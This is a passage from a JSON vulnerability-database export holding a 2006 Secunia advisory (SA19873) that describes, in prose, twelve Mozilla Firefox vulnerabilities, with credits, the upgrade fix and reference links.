"https://vulners.com/securityvulns/SECURITYVULNS:VULN:9010", "title": "GnuTLS library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nMozilla Firefox Multiple Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19873\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19873/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nCross Site Scripting, DoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nMozilla Firefox 1.x\r\nhttp://secunia.com/product/4227/\r\nMozilla Firefox 0.x\r\nhttp://secunia.com/product/3256/\r\n\r\nDESCRIPTION:\r\nMultiple vulnerabilities have been reported in Mozilla Firefox, which\r\ncan be exploited by malicious people to conduct cross-site scripting\r\nattacks or compromise a user's system.\r\n\r\n1) An error within the handling of JavaScript references to frames\r\nand windows may in certain circumstances result in the reference not\r\nbeing properly cleared and allows execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n2) An error within the handling of Java references to properties of\r\nthe window.navigator object allows execution of arbitrary code if a\r\nweb page replaces the navigator object before starting Java.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n3) A memory corruption error within the handling of simultaneously\r\nhappening XPCOM events results in the use of a deleted timer object\r\nand allows execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n4) Insufficient access checks on standard DOM methods of the\r\ntop-level document object (e.g. "document.getElementById()") can be\r\nexploited by a malicious web site to execute arbitrary script code in\r\nthe context of another site.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n5) A race condition where JavaScript garbage collection deletes a\r\ntemporary variable still being used in the creation of a new Function\r\nobject may allow execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n6) Various errors in the JavaScript engine during garbage collection\r\nwhere used pointers are deleted and integer overflows when handling\r\nlong strings e.g. passed to the "toSource()" methods of the Object,\r\nArray, and String objects may allow execution of arbitrary code.\r\n\r\n7) Named JavaScript functions have a parent object created using the\r\nstandard "Object()" constructor, which can be redefined by script.\r\nThis can be exploited to run script code with elevated privileges if\r\nthe "Object()" constructor returns a reference to a privileged\r\nobject.\r\n\r\n8) An error within the handling of PAC script can be exploited by a\r\nmalicious Proxy AutoConfig (PAC) server to execute script code with\r\nescalated privileges by setting the FindProxyForURL function to the\r\neval method on a privileged object that has leaked into the PAC\r\nsandbox.\r\n\r\n9) An error within the handling of scripts granted the\r\n"UniversalBrowserRead" privilege can be exploited to execute script\r\ncode with escalated privileges equivalent to "UniversalXPConnect".\r\n\r\n10) An error can be exploited to execute arbitary script code in\r\ncontext of another site by using the\r\n"XPCNativeWrapper(window).Function(...)" construct, which creates a\r\nfunction that appears to belong to another site.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n11) A memory corruption error when calling\r\n"nsListControlFrame::FireMenuItemActiveEvent()", some potential\r\nstring class buffer overflows, a memory corruption error when\r\nanonymous box selectors are outside of UA stylesheets, references to\r\nremoved nodes, errors involving table row and column groups, and an\r\nerror in "crypto.generateCRMFRequest" callback may potentially be\r\nexploited to execute arbitrary code.\r\n\r\n12) An error within the handling of "chrome:" URI's can be exploited\r\nto reference remote files that can run scripts with full privileges.\r\n\r\nSOLUTION:\r\nUpdate to version 1.5.0.5.\r\nhttp://www.mozilla.com/firefox/\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n1) Thilo Girmann\r\n2) Discovered by an anonymous person and reported via ZDI.\r\n3) Carsten Eiram, Secunia Research.\r\n4) Thor Larholm\r\n5) H. D. Moore\r\n6) Igor Bukanov, shutdown, and Georgi Guninski.\r\n7) moz_bug_r_a4\r\n8) moz_bug_r_a4\r\n9) shutdown\r\n10) shutdown\r\n11) Mozilla Developers\r\n12) Benjamin Smedberg, Mozilla.\r\n\r\nORIGINAL ADVISORY:\r\nMozilla.org:\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-46.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-47.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-48.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-50.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-51.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-52.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-53.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-54.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-55.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-56.html\r\n\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-53/\r\n\r\nZDI:\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-025.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.", "modified": "2006-07-27T00:00:00", "published": "2006-07-27T00:00:00", "id": "SECURITYVULNS:DOC:13642", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13642", "title": "[SA19873] Mozilla Firefox Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
